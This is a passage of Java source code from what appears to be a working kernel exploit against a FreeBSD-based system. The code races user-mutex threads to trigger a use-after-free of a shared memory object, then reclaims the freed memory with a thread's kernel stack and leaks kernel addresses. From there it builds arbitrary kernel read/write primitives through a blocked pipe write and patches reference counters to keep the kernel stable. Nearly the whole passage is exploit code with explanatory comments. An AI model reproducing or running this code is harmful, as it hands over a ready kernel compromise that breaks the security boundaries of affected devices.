Log.debug("[main] Closing original descriptor #" + descriptor + " of primary shared memory object");
if (!KernelHelper.closeDescriptor(descriptor)) {
throw Log.error("Closing original descriptor #" + descriptor + " of primary shared memory object failed");
}
Log.debug("[main] We are ready to start");
// Notify other threads that we are ready to start.
readyFlag.set(true);
// Wait for other threads to be ready.
waitForCounter(numReadyThreads, MAX_DESTROYER_THREADS + 1, " threads to be ready"); // Plus one for lookup thread
// Clear `ready` flag, thus no other thread will start its loop again prematurely.
readyFlag.set(false);
// Reset `ready` counter to reuse it during cleaning step.
numReadyThreads.set(0);
// Notify destroyer threads that they should attempt to destroy primary shared memory object.
destroyFlag.set(true);
// Wait until the other threads have done their main job.
waitForCounter(numCompletedThreads, MAX_DESTROYER_THREADS + 1, " threads to be completed"); // Plus one for lookup thread
final int count = numDestructions.get();
Log.debug("[main] Number of successful destructions: " + count);
Log.debug("[main] Spraying and praying");
for (int i = 0; i < reclaimDescriptors.length; i++) {
Log.debug("[main] Switching to destroyer thread #" + i + " core");
if (!ThreadUtil.setCurrentThreadCpuAffinity(DESTROYER_THREAD_CORES[i])) {
throw Log.error("[main] Switching to destroyer thread #" + i + " core failed");
}
Log.debug("[main] Creating secondary user mutex #" + i);
descriptor = KernelHelper.createUserMutex(secondarySharedMemoryKeyAddress);
if (descriptor == -1) {
throw Log.error("[main] Creating secondary user mutex #" + i + " failed");
}
Log.debug("[main] Descriptor of secondary shared memory object #" + i + ": " + descriptor);
reclaimDescriptors[i] = descriptor;
Log.debug("[main] Truncating secondary shared memory object #" + i);
if (!truncateSharedMemorySpecial(descriptor)) {
throw Log.error("[main] Truncating secondary shared memory object #" + i + " failed");
}
Log.debug("[main] Destroying secondary user mutex #" + i);
if (!KernelHelper.destroyUserMutex(secondarySharedMemoryKeyAddress)) {
throw Log.error("[main] Destroying secondary user mutex #" + i + " failed");
}
}
Log.debug("[main] Switching to initial core");
if (!ThreadUtil.setCurrentThreadCpuAffinity(MAIN_THREAD_CORES)) {
throw Log.error("[main] Switching to initial core failed");
}
Log.debug("[main] Spraying done");
Log.debug("[main] Checking for shared memory object corruption");
descriptor = checkForCorruption();
if (descriptor != -1) {
Log.debug("[main] Checking succeeded, winner descriptor of shared memory object: " + descriptor);
winnerDescriptor = descriptor;
} else {
Log.debug("[main] Checking failed");
}
for (int i = 0; i < reclaimDescriptors.length; i++) {
descriptor = reclaimDescriptors[i];
if (descriptor == -1) {
continue;
}
if (winnerDescriptor != -1 && winnerDescriptor == descriptor) {
// We do not need to close it, so just reset descriptor.
destroyerThreadIndex = i;
} else {
Log.debug("[main] Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i);
if (!KernelHelper.closeDescriptor(descriptor)) {
throw Log.error("Closing descriptor #" + descriptor + " of reclaim shared memory object #" + i + " failed");
}
reclaimDescriptors[i] = -1;
}
}
// Notify all threads that they should not be destroyed yet.
destroyFlag.set(false);
// Notify other threads that check was done.
checkDoneFlag.set(true);
if (count == MAX_DESTROYER_THREADS && winnerDescriptor != -1) {
// Set new size of primary shared memory object to match kernel stack size.
Log.debug("[main] Truncating shared memory object with descriptor #" + winnerDescriptor);
if (!KernelHelper.truncateSharedMemory(winnerDescriptor, Constants.KERNEL_STACK_SIZE)) {
throw Log.error("[main] Truncating shared memory object with descriptor #" + winnerDescriptor + " failed");
}
final long lookupSize = KernelHelper.getFileSize(lookupDescriptor, statAddress);
Log.debug("[main] Size of shared memory object with lookup descriptor #" + lookupDescriptor + ": " + TypeUtil.int64ToHex(lookupSize));
final long winnerSize = KernelHelper.getFileSize(winnerDescriptor, statAddress);
Log.debug("[main] Size of shared memory object with winner descriptor #" + winnerDescriptor + ": " + TypeUtil.int64ToHex(winnerSize));
Log.debug("[main] We have some result!!!");
// Notify other threads that racing succeeded.
raceDoneFlag.set(true);
}
// Wait until the other threads are ready to finish.
waitForCounter(numReadyThreads, MAX_DESTROYER_THREADS + 1, " threads to be ready for finish"); // Plus one for lookup thread
// Notify other threads that we are done.
doneFlag.set(true);
// Wait until the other threads have finished.
waitForCounter(numFinishedThreads, MAX_DESTROYER_THREADS + 1, " threads to be finished"); // Plus one for lookup thread
// Reset everything if we did not find proper descriptor.
if (winnerDescriptor == -1) {
Log.debug("[main] Cleaning up state");
cleanupState();
Log.debug("[main] Resetting state");
resetState();
}
numIterations++;
Log.debug("[main] Finishing loop");
}
// Recover initial CPU affinity mask for main thread.
Log.debug("Recovering initial CPU affinity mask for main thread");
if (!ThreadUtil.setCurrentThreadCpuAffinity(api.getInitialCpuAffinity())) {
throw Log.error("Recovering initial CPU affinity mask for main thread failed");
}
final boolean gotResult = raceDoneFlag.get();
// Notify other threads that we are done.
raceDoneFlag.set(true);
if (gotResult) {
Log.debug("Original descriptor of primary shared memory object: " + originalDescriptor);
if (lookupDescriptor == -1) {
throw Log.error("Racing done but lookup descriptor not found");
}
Log.debug("Lookup descriptor of primary shared memory object: " + lookupDescriptor);
if (winnerDescriptor == -1) {
throw Log.error("Racing done but winner descriptor not found");
}
Log.debug("Winner descriptor of primary shared memory object: " + winnerDescriptor);
Log.info("Got memory corruption after " + numIterations + " iterations");
} else {
Log.warn("No memory corruption even after " + numIterations + " iterations");
}
return gotResult;
}
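// Joins the lookup and destroyer threads once the race is over, so that only the reclaim
// threads (and the main thread) keep running.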
private void finishWorkingThreads() {
// Finish all working threads, thus only reclaim threads will be running.
destroyFlag.set(true);
// Give other threads some time to finish.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
Log.debug("Joining lookup thread");
try {
lookupThread.join();
} catch (InterruptedException e) {
throw Log.error("Joining lookup thread failed");
}
Log.debug("Unsetting lookup thread");
lookupThread = null;
Log.debug("Joining destroyer threads");
for (int i = 0; i < MAX_DESTROYER_THREADS; i++) {
final Thread thread = destroyerThreads.get(i);
//Log.debug("Joining destroyer thread #" + i);
try {
thread.join();
} catch (InterruptedException e) {
throw Log.error("Joining destroyer thread #" + i + " failed");
}
}
Log.debug("Clearing destroyer thread list");
destroyerThreads.clear();
}
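// Post-exploitation: closes the winner descriptor to free the primary shared memory object,
// maps it through the lookup descriptor, then starts the reclaim threads so that one of their
// kernel stacks lands in the freed memory. Once a thread marker shows up in the mapped data,
// that thread is parked in a blocking pipe read and becomes the command processor behind the
// slow kernel read/write primitives; its leaked kernel thread address is verified by reading
// the thread name.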
private boolean postExploit() {
if (destroyerThreadIndex == -1) {
Log.debug("No destroyer thread index found");
return false;
}
if (toggleStoppingWorkingThreadsBeforeRemap) {
finishWorkingThreads();
}
for (int i = 0; i < MAX_EXTRA_USER_MUTEXES; i++) {
Log.debug("Creating extra user mutex #" + i);
final int descriptor = KernelHelper.createUserMutex(extraSharedMemoryKeyAddress);
if (descriptor == -1) {
throw Log.error("Creating extra user mutex #" + i + " failed");
}
Log.debug("Descriptor of extra shared memory object #" + i + ": " + descriptor);
}
// Free primary shared memory object.
if (winnerDescriptor != -1) {
Log.debug("Closing winner descriptor #" + winnerDescriptor + " of primary shared memory object");
if (!KernelHelper.closeDescriptor(winnerDescriptor)) {
throw Log.error("Closing winner descriptor #" + winnerDescriptor + " of primary shared memory object");
}
winnerDescriptor = -1;
}
// Map memory of freed primary shared memory object.
Log.debug("Mapping memory of shared memory object with lookup descriptor #" + lookupDescriptor);
long mappedKernelStackAddress = KernelHelper.mapMemoryWithDescriptor(0, Constants.KERNEL_STACK_SIZE, lookupDescriptor, 0);
if (mappedKernelStackAddress != 0L) {
Log.debug("Mapped address of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress));
mappedKernelStackAddresses.add(new Long(mappedKernelStackAddress));
Log.debug("Protecting mapped memory of potential kernel stack");
if (!KernelHelper.protectMemory(mappedKernelStackAddress, Constants.KERNEL_STACK_SIZE, Constants.PROT_READ | Constants.PROT_WRITE)) {
Log.debug("Protecting mapped memory of potential kernel stack failed");
if (toggleUnmappingOnFailure) {
Log.debug("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress));
if (!KernelHelper.unmapMemory(mappedKernelStackAddress, Constants.KERNEL_STACK_SIZE)) {
Log.warn("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress) + " failed");
}
}
mappedKernelStackAddress = 0L;
}
} else {
Log.debug("Mapping memory of shared memory object with lookup descriptor #" + lookupDescriptor + " failed");
}
if (!toggleStoppingWorkingThreadsBeforeRemap) {
finishWorkingThreads();
}
long threadAddress = 0L;
if (mappedKernelStackAddress != 0L) {
// We need to observe kernel stack before destroying any running threads.
destroyFlag.set(false);
final int scanSize = Constants.PHYS_PAGE_SIZE;
final long scanAddress = mappedKernelStackAddress + Constants.KERNEL_STACK_SIZE - scanSize;
stackDataBuffer = new MemoryBuffer(scanAddress, scanSize - 0x20);
Log.debug("Starting reclaim threads");
// Start reclaim threads to occupy the freed shared memory object with the virtual memory object of one of their kernel stacks.
for (int i = 0; i < MAX_RECLAIM_THREADS; i++) {
final Thread thread = reclaimThreads.get(i);
//Log.debug("Starting reclaim thread #" + i);
thread.start();
}
Log.debug("Reclaim threads started");
// There could be a problem when threads are created: the address of the freed shared memory object
// can be reused (initialized with zeros). See: sys_thr_new -> kern_thr_new -> thread_create -> kern_thr_alloc
// Kick all reclaim threads at once, so they can start real execution at the same time.
readyFlag.set(true);
Log.debug("Checking if reclaimed memory belongs to controlled thread");
// XXX: Need to be careful with logging here because it may cause reliability problems.
boolean reclaimThreadFound = false;
boolean accessChecked = false;
for (int i = 0; i < MAX_SEARCH_LOOP_INVOCATIONS; i++) {
// Give some execution time to the reclaim threads.
ThreadUtil.sleepMs(KERNEL_STACK_WAIT_PERIOD);
if (!accessChecked) {
// The mapped memory region might not be readable; check that.
if (!api.checkMemoryAccess(mappedKernelStackAddress)) {
Log.debug("Checking access to reclaimed memory failed");
if (toggleUnmappingOnFailure) {
Log.debug("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress));
if (!KernelHelper.unmapMemory(mappedKernelStackAddress, Constants.KERNEL_STACK_SIZE)) {
Log.warn("Unmapping memory of potential kernel stack: " + TypeUtil.int64ToHex(mappedKernelStackAddress) + " failed");
}
}
mappedKernelStackAddress = 0L;
break;
}
accessChecked = true;
}
if (dumpKernelStackPartially) {
final int count = stackDataBuffer.getSize() / 8;
boolean allZeros = true;
for (int j = 0; j < count; j++) {
final long value = stackDataBuffer.read64(j * 8);
if (value != 0L) {
Log.debug("Found some kernel stack data at " + TypeUtil.int32ToHex(j * 8) + ": " + TypeUtil.int64ToHex(value, true));
allZeros = false;
break;
}
}
if (!allZeros) {
Log.info("Leaked partial kernel stack data:");
stackDataBuffer.dump();
}
}
final int offset = stackDataBuffer.find(markerPatternAddress, 0x3);
if (offset != -1) {
Log.debug("Found marker pattern in kernel stack at " + TypeUtil.int32ToHex(offset));
if (dumpKernelStackOfReclaimThread) {
Log.info("Leaked kernel stack data:");
stackDataBuffer.dump();
}
Log.debug("Classifying leaked kernel addresses");
final KernelAddressClassifier classifier = KernelAddressClassifier.fromBuffer(stackDataBuffer);
if (dumpKernelStackPointers) {
classifier.dump();
}
// Get the byte that follows the 3-byte marker pattern (the per-thread index byte) and convert it to a reclaim job index.
final int reclaimJobIndex = (stackDataBuffer.read8(offset + 3) - 0x41) - 1;
Log.debug("Determined reclaim job index: " + reclaimJobIndex);
if (reclaimJobIndex >= 0 && reclaimJobIndex < MAX_RECLAIM_THREADS) {
final ReclaimJob job = (ReclaimJob)reclaimJobs.get(reclaimJobIndex);
final String jobName = job.getJobName();
Log.debug("Found reclaim thread '" + jobName + "' using " + (i + 1) + " attempts");
mappedReclaimKernelStackAddress = mappedKernelStackAddress;
final Long potentialThreadAddress = classifier.getMostOccuredHeapAddress(KERNEL_THREAD_POINTER_OCCURRENCE_THRESHOLD);
if (potentialThreadAddress != null) {
final long potentialThreadAddressValue = potentialThreadAddress.longValue();
Log.info("Found potential kernel thread address: " + TypeUtil.int64ToHex(potentialThreadAddressValue));
threadAddress = potentialThreadAddressValue;
}
api.setKernelPrimitives(Api.KERNEL_PRIMITIVES_KIND_SLOW);
job.setTarget(true);
break;
} else {
Log.debug("Job index is bad, continuing checking");
}
}
}
if (mappedReclaimKernelStackAddress != 0L) {
Log.debug("[main] Resetting ready flag");
readyFlag.set(false);
} else {
Log.debug("[main] Reclaim thread not found");
}
// Trigger all threads (except reclaim one) to terminate execution.
destroyFlag.set(true);
Thread.yield();
Log.debug("Joining reclaim threads");
for (int i = 0; i < MAX_RECLAIM_THREADS; i++) {
final Thread thread = reclaimThreads.get(i);
final ReclaimJob job = (ReclaimJob)reclaimJobs.get(i);
if (!job.isTarget()) {
//Log.debug("Joining reclaim thread #" + i);
try {
thread.join();
} catch (InterruptedException e) {
throw Log.error("Joining reclaim thread #" + i + " failed");
}
} else {
Log.debug("Skipping target reclaim thread #" + i);
targetReclaimThread = thread;
targetReclaimJob = job;
}
}
reclaimThreads.clear();
reclaimJobs.clear();
} else {
// Trigger all threads to terminate execution.
destroyFlag.set(true);
}
boolean succeeded = mappedReclaimKernelStackAddress != 0L;
if (succeeded) {
// Let reclaim thread do blocking read call.
Log.debug("[main] Setting ready flag");
readyFlag.set(true);
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
Log.debug("[main] Attempting to unlock pipe for kernel primitives");
if (!targetReclaimJob.unlockPipe()) {
Log.warn("[main] Attempting to unlock pipe for kernel primitives failed");
succeeded = false;
} else {
Log.debug("[main] Pipe for kernel primitives unlocked");
}
if (succeeded) {
Log.debug("[main] Waiting for command processor to start up");
while (!targetReclaimJob.isCommandProccesorRunning()) {
Thread.yield();
}
Log.debug("[main] Done waiting for command processor to start up");
boolean isGoodAddress = false;
if (threadAddress != 0L) {
// Check if leaked kernel thread address actually belongs to reclaim thread.
final long kernelThreadNameAddress = threadAddress + Offsets.offsetOf_thread_name;
final Integer result = readSlow(kernelThreadNameAddress, threadNameAddress, MAX_RECLAIM_THREAD_NAME_SIZE);
if (result != null && result.intValue() == MAX_RECLAIM_THREAD_NAME_SIZE) {
final String threadName = api.readCString(threadNameAddress, MAX_RECLAIM_THREAD_NAME_SIZE - 1);
Log.debug("Leaked kernel thread name: " + threadName);
if (threadName.equals(targetReclaimJob.getJobName())) {
isGoodAddress = true;
Log.debug("Kernel thread address is correct");
} else {
Log.warn("Leaked kernel address does not belong to reclaim thread");
}
}
if (!isGoodAddress) {
Log.warn("Potential kernel thread address is not correct");
}
} else {
// Should not happen in normal situation.
Log.warn("Potential kernel thread address not found");
}
if (isGoodAddress) {
Globals.threadAddress = threadAddress;
} else {
// Should not happen in normal situation.
throw Log.error("Initial kernel primitives can be still used for further exploitation");
}
}
if (!succeeded) {
// XXX: Ideally the reclaim thread should be cleaned up in this case,
// but since we hit a problem we cannot recover things, so the
// kernel may panic after some time.
targetReclaimThread = null;
targetReclaimJob = null;
}
}
System.gc();
return succeeded;
}
private static void waitForCounter(AtomicInteger value, int threshold, String text) {
int count = 0;
while (true) {
count = value.get();
if (count >= threshold) {
break;
}
//Log.debug("[main] Waiting for" + text + " (" + count + "/" + threshold + ")");
Thread.yield();
}
//Log.debug("[main] Done waiting for" + text + " (" + count + "/" + threshold + ")");
}
private static boolean truncateSharedMemorySpecial(int descriptor) {
return KernelHelper.truncateSharedMemory(descriptor, (long)descriptor * MAGIC_NUMBER);
}
//-------------------------------------------------------------------------
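// Stabilization: bumps the reference counters disturbed by the exploit (the shmfd and file of
// the corrupted shared memory object, and the vm objects backing the reclaimed kernel stacks)
// and wipes `td_kstack` of the hijacked thread, so that normal teardown does not free memory
// that is still in use and potentially panic the kernel.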
public boolean stabilize() {
Log.debug("Fixing up shared memory object file");
if (!fixupSharedMemory()) {
Log.warn("Fixing up shared memory object file failed");
}
Log.debug("Fixing up kernel stack");
if (!fixupKernelStack()) {
Log.warn("Fixing up kernel stack failed");
}
return true;
}
private boolean fixupSharedMemory() {
if (Globals.processAddress == 0L) {
Log.warn("Process address not found");
return false;
}
Log.debug("Process address: " + TypeUtil.int64ToHex(Globals.processAddress));
if (lookupDescriptor == -1) {
Log.warn("Lookup descriptor of primary shared memory object not found");
return false;
}
Log.debug("Lookup descriptor of primary shared memory object: " + lookupDescriptor);
long[] fileAddresses;
long fileAddress, fileDescEntryAddress;
fileAddresses = ProcessUtil.getFileDescAddressesForProcessByDescriptor(Globals.processAddress, lookupDescriptor, false);
if (fileAddresses == null) {
Log.warn("Getting file addresses of lookup descriptor failed");
return false;
}
fileAddress = fileAddresses[0];
if (fileAddress == 0L) {
Log.warn("Lookup file address not found");
return false;
}
Log.debug("Lookup file address: " + TypeUtil.int64ToHex(fileAddress));
long refCountAddress;
int numFixes = 0;
final long sharedMemoryFileDescAddress = api.readKernel64(fileAddress + Offsets.offsetOf_file_data); // void* f_data (struct shmfd*)
if (sharedMemoryFileDescAddress != 0L) {
Log.debug("Shared memory file descriptor address: " + TypeUtil.int64ToHex(sharedMemoryFileDescAddress));
refCountAddress = sharedMemoryFileDescAddress + Offsets.offsetOf_shmfd_refs;
Log.debug("Stabilizing reference counter of shared memory file descriptor at " + TypeUtil.int64ToHex(refCountAddress));
KernelHelper.stabilizeRefCounter(refCountAddress, 4);
numFixes++;
} else {
Log.warn("Shared memory file descriptor address not found");
}
refCountAddress = fileAddress + Offsets.offsetOf_file_count;
Log.debug("Stabilizing reference counter of file at " + TypeUtil.int64ToHex(refCountAddress));
KernelHelper.stabilizeRefCounter(refCountAddress, 4);
numFixes++;
final Iterator<Integer> iterator = usedDescriptors.iterator();
while (iterator.hasNext()) {
final int descriptor = ((Integer)iterator.next()).intValue();
Log.debug("Checking exploited descriptor #" + descriptor);
fileAddresses = ProcessUtil.getFileDescAddressesForProcessByDescriptor(Globals.processAddress, descriptor, false);
if (fileAddresses != null) {
fileAddress = fileAddresses[0];
Log.debug("File address: " + TypeUtil.int64ToHex(fileAddress));
fileDescEntryAddress = fileAddresses[1];
Log.debug("File descriptor entry address: " + TypeUtil.int64ToHex(fileDescEntryAddress));
if (fileAddress != 0L && fileDescEntryAddress != 0L) {
final short fileType = api.readKernel16(fileAddress + Offsets.offsetOf_file_type); // short f_type
if (fileType == Constants.DTYPE_SHM) {
// Reset file pointer of exploited shared memory file object. This is a workaround for a `shm_drop` crash after
// `shmfd` is reused: `shm_object` may contain a garbage pointer that would be dereferenced there.
Log.debug("Overwriting file address");
// TODO: Check if needed (causes crashes sometimes?):
//api.writeKernel64(fileDescEntryAddress + Offsets.offsetOf_filedescent_file, 0L); // struct file* fde_file
numFixes++;
}
} else {
Log.warn("File address of descriptor #" + descriptor + " not found");
}
} else {
Log.warn("Getting file addresses of descriptor #" + descriptor + " failed");
}
}
return numFixes >= 2;
}
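// Walks the process VM map and, for every entry whose start address matches one of the mapped
// kernel stacks, stabilizes the reference counter of the backing vm_object; `td_kstack` of the
// hijacked thread is wiped first so the kernel will not try to destroy that stack itself.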
private boolean fixupKernelStack() {
final int stackUserAddressCount = mappedKernelStackAddresses.size();
if (stackUserAddressCount == 0) {
return false;
}
// Wipe `td_kstack` so the kernel will not try to destroy it.
api.writeKernel64(Globals.threadAddress + Offsets.offsetOf_thread_kstack, 0L); // vm_offset_t td_kstack
final int[] numFixes = new int[] { 0 };
class FixVirtualMemoryMap implements MemoryUtil.VirtualMemoryMapEntryProcessor {
public Boolean processEntry(long mapEntryKernelAddress, MemoryBuffer mapEntryBuffer, long index) {
//Checks.ensureKernelAddressRange(mapEntryKernelAddress, Offsets.sizeOf_vm_map_entry);
//Checks.ensureNotNull(mapEntryBuffer);
final long startUserAddress = mapEntryBuffer.read64(Offsets.offsetOf_vm_map_entry_start);
//Log.debug("Start user address: " + TypeUtil.int64ToHex(startUserAddress));
final Iterator<Long> iterator = mappedKernelStackAddresses.iterator();
int addressIndex = 0;
while (iterator.hasNext()) {
final Long userAddress = iterator.next();
//Log.debug("Current user address: " + TypeUtil.int64ToHex(userAddress));
if (userAddress == startUserAddress) {
Log.debug("Found match with kernel stack #" + addressIndex + ": " + TypeUtil.int64ToHex(userAddress));
final long objectAddress = mapEntryBuffer.read64(Offsets.offsetOf_vm_map_entry_object);
Log.debug("Object address: " + TypeUtil.int64ToHex(objectAddress));
if (objectAddress != 0L) {
final long refCountAddress = objectAddress + Offsets.offsetOf_vm_object_ref_count;
Log.debug("Stabilizing reference counter at " + TypeUtil.int64ToHex(refCountAddress));
KernelHelper.stabilizeRefCounter(refCountAddress, 4);
numFixes[0]++;
}
}
addressIndex++;
}
final boolean needMore = numFixes[0] < stackUserAddressCount;
return new Boolean(needMore);
}
}
final long vmMapAddress = Globals.vmSpaceAddress + Offsets.offsetOf_vmspace_map;
Log.debug("VM map address: " + TypeUtil.int64ToHex(vmMapAddress));
Log.debug("Traversing VM map entries");
if (!MemoryUtil.traverseVirtualMemoryMap(vmMapAddress, new FixVirtualMemoryMap())) {
Log.warn("Traversing VM map entries failed");
return false;
}
return numFixes[0] >= stackUserAddressCount;
}
//-------------------------------------------------------------------------
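// "Slow" kernel read/write primitives. Each fixed-width accessor stages the value in temporary
// user memory and delegates to readSlow/writeSlow, which split the request into pipe-sized
// chunks and funnel them through the blocked reclaim thread (see readSlowInternal for the
// blocking pipe technique).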
public Byte read8Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x1L);
final Long result = readSlow(kernelAddress, valueAddress, 0x1L);
// Check for null before unboxing to avoid a NullPointerException when the read fails.
if (result == null || result.longValue() != 0x1L) {
return null;
}
return new Byte(api.read8(valueAddress));
}
public boolean write8Slow(long kernelAddress, byte value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x1L);
api.write8(valueAddress, value);
final Long result = writeSlow(kernelAddress, valueAddress, 0x1L);
// Check for null before unboxing to avoid a NullPointerException when the write fails.
return result != null && result.longValue() == 0x1L;
}
public Short read16Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x2L);
final Long result = readSlow(kernelAddress, valueAddress, 0x2L);
if (result == null || result.longValue() != 0x2L) {
return null;
}
return new Short(api.read16(valueAddress));
}
public boolean write16Slow(long kernelAddress, short value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x2L);
api.write16(valueAddress, value);
final Long result = writeSlow(kernelAddress, valueAddress, 0x2L);
return result != null && result.longValue() == 0x2L;
}
public Integer read32Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x4L);
final Long result = readSlow(kernelAddress, valueAddress, 0x4L);
if (result == null || result.longValue() != 0x4L) {
return null;
}
return new Integer(api.read32(valueAddress));
}
public boolean write32Slow(long kernelAddress, int value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x4L);
api.write32(valueAddress, value);
final Long result = writeSlow(kernelAddress, valueAddress, 0x4L);
return result != null && result.longValue() == 0x4L;
}
public Long read64Slow(long kernelAddress) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x8L);
final Long result = readSlow(kernelAddress, valueAddress, 0x8L);
if (result == null || result.longValue() != 0x8L) {
return null;
}
return new Long(api.read64(valueAddress));
}
public boolean write64Slow(long kernelAddress, long value) {
Checks.ensureKernelAddress(kernelAddress);
final long valueAddress = api.getTempMemory(0x8L);
api.write64(valueAddress, value);
final Long result = writeSlow(kernelAddress, valueAddress, 0x8L);
return result != null && result.longValue() == 0x8L;
}
public Long readSlow(long kernelAddress, long userAddress, long size) {
Checks.ensureKernelAddressRange(kernelAddress, size);
Checks.ensureUserAddressRange(userAddress, size);
Checks.ensureNotNull(targetReclaimJob);
if (size == 0L) {
return new Long(0L);
}
class Processor implements MemoryUtil.MemoryRangeProcessor {
private long userAddress;
public Processor(long userAddress) {
this.userAddress = userAddress;
}
public Boolean processChunk(long kernelAddress, long chunkSize, boolean isLastChunk) {
//Log.debug("Reading" + (isLastChunk ? " last" : "") + " chunk from kernel address " + TypeUtil.int64ToHex(kernelAddress) + " to user address " + TypeUtil.int64ToHex(userAddress) + " of size " + TypeUtil.int64ToHex(chunkSize) + " bytes");
final Long tempResult = readSlowInternal(kernelAddress, userAddress, chunkSize);
if (tempResult == null) {
return new Boolean(false);
}
final long count = tempResult.longValue();
final boolean completed = (count == chunkSize);
//Log.debug("Got " + (completed ? "all " : "") + TypeUtil.int64ToHex(count) + " bytes");
userAddress += tempResult.longValue();
return new Boolean(completed);
}
}
final Processor processor = new Processor(userAddress);
synchronized (targetReclaimJob) {
final long lastKernelAddress = MemoryUtil.processMemoryRange(kernelAddress, size, processor, MemoryUtil.MEMORY_KIND_KERNEL, Api.MAX_PIPE_BUFFER_SIZE);
if (lastKernelAddress == 0L) {
return null;
}
final long result = lastKernelAddress - kernelAddress;
return new Long(result);
}
}
public Integer readSlow(long kernelAddress, long userAddress, int size) {
final Long result = readSlow(kernelAddress, userAddress, Checks.checkedInteger(size));
if (result == null) {
return null;
}
return new Integer(result.intValue());
}
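// Arbitrary kernel write: mirrors `readSlow` above. The requested range is split into chunks of at most
// `Api.MAX_PIPE_BUFFER_SIZE` bytes by `MemoryUtil.processMemoryRange`, and each chunk is pushed from user
// memory into kernel memory through `writeSlowInternal`. Returns the number of bytes written, or null on failure.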
public Long writeSlow(long kernelAddress, long userAddress, long size) {
Checks.ensureKernelAddressRange(kernelAddress, size);
Checks.ensureUserAddressRange(userAddress, size);
Checks.ensureNotNull(targetReclaimJob);
if (size == 0L) {
return new Long(0L);
}
class Processor implements MemoryUtil.MemoryRangeProcessor {
private long userAddress;
public Processor(long userAddress) {
this.userAddress = userAddress;
}
public Boolean processChunk(long kernelAddress, long chunkSize, boolean isLastChunk) {
//Log.debug("Writing " + (isLastChunk ? "last " : "") + "chunk from user address " + TypeUtil.int64ToHex(userAddress) + " to kernel address " + TypeUtil.int64ToHex(kernelAddress) + " of size " + TypeUtil.int64ToHex(chunkSize) + " bytes");
final Long tempResult = writeSlowInternal(kernelAddress, userAddress, chunkSize);
if (tempResult == null) {
return new Boolean(false);
}
final long count = tempResult.longValue();
final boolean completed = (count == chunkSize);
//Log.debug("Got " + (completed ? "all " : "") + TypeUtil.int64ToHex(count) + " bytes");
userAddress += tempResult.longValue();
return new Boolean(completed);
}
}
final Processor processor = new Processor(userAddress);
synchronized (targetReclaimJob) {
final long lastKernelAddress = MemoryUtil.processMemoryRange(kernelAddress, size, processor, MemoryUtil.MEMORY_KIND_KERNEL, Api.MAX_PIPE_BUFFER_SIZE);
if (lastKernelAddress == 0L) {
return null;
}
final long result = lastKernelAddress - kernelAddress;
return new Long(result);
}
}
public Integer writeSlow(long kernelAddress, long userAddress, int size) {
final Long result = writeSlow(kernelAddress, userAddress, Checks.checkedInteger(size));
if (result == null) {
return null;
}
return new Integer(result.intValue());
}
private Long readSlowInternal(long kernelAddress, long userAddress, long size) {
Checks.ensureTrue(KernelHelper.checkSizeForReadWriteIntoPipe(size));
if (size == 0L) {
return new Long(0L);
}
// Blocking algorithm for the pipe:
// 1) On the main thread, write to the pipe until its buffer of `BIG_PIPE_SIZE` (or `pipeBufferCapacity`) bytes is full.
// Each individual write must be smaller than `PIPE_MINDIRECT`, otherwise it triggers `pipe_direct_write`,
// which bypasses the buffered path we rely on for blocking.
// 2) On the reclaim thread, write to the same pipe again; this call blocks. While it is blocked, modify the
// `struct iovec` and `struct uio` on that thread's kernel stack.
// 3) On the main thread, read `BIG_PIPE_SIZE` (or `pipeBufferCapacity`) bytes from the pipe. This unblocks the
// reclaim thread, whose write now proceeds with the modified parameters. The data read here is garbage and is discarded.
// 4) On the main thread, read from the same pipe again, this time using the originally requested `size`.
//
// pipe_write(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
// uiomove(void* cp = &wpipe->pipe_buffer.buffer[wpipe->pipe_buffer.in], int n = segsize, struct uio* uio = uio)
// uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
// UIO_USERSPACE: copyin(const void* uaddr = iov->iov_base, void* kaddr = cp, size_t len = cnt)
// UIO_SYSSPACE: bcopy(const void* src = iov->iov_base, void* dst = cp, size_t len = cnt)
// Clear pipe buffer.
//api.clearMemory(pipeBufferAddress, pipeBufferCapacity);
// Set up parameters for command processor.
targetReclaimJob.setCommandWaitFlag(true);
targetReclaimJob.setCommandArg(0, kernelAddress); // src
targetReclaimJob.setCommandArg(1, userAddress); // dst
targetReclaimJob.setCommandArg(2, size); // size
// Preparation step: fill the pipe buffer so that the reclaim thread's upcoming write call will block.
final int count = MathUtil.divideUnsigned(pipeBufferCapacity, Api.MAX_PIPE_BUFFER_SIZE);
//Log.debug("Pipe write count: " + count);
int garbageSize = 0;
for (int i = 0; i < count; i++) {
//Log.debug("Writing to write pipe #" + writePipeDescriptor + " at " + TypeUtil.int64ToHex(pipeBufferAddress) + " of size " + TypeUtil.int32ToHex(Api.MAX_PIPE_BUFFER_SIZE) + " bytes");
final long result = LibKernel.write(writePipeDescriptor, pipeBufferAddress, Api.MAX_PIPE_BUFFER_SIZE);
if (result == -1L) {
api.warnMethodFailedPosix("write");
return null;
} else if (result == 0L) {
Log.debug("Writing done");
break;
}
final int curSize = (int)result;
garbageSize += curSize;
//Log.debug("Written " + TypeUtil.int32ToHex(curSize) + " bytes");
}
//Log.debug("Garbage size: " + TypeUtil.int32ToHex(garbageSize));
// Issue read command.
//Log.debug("Issuing read command");
targetReclaimJob.setCommand(CMD_READ);
// Wait for the write call on the reclaim thread to block.
ThreadUtil.sleepMs(TINY_WAIT_PERIOD);
// We have this partial stack layout:
// struct {
// struct iovec aiov;
// struct uio auio;
// };
//
// To locate it inside the leaked stack buffer, build a search pattern from the known `aiov` contents.
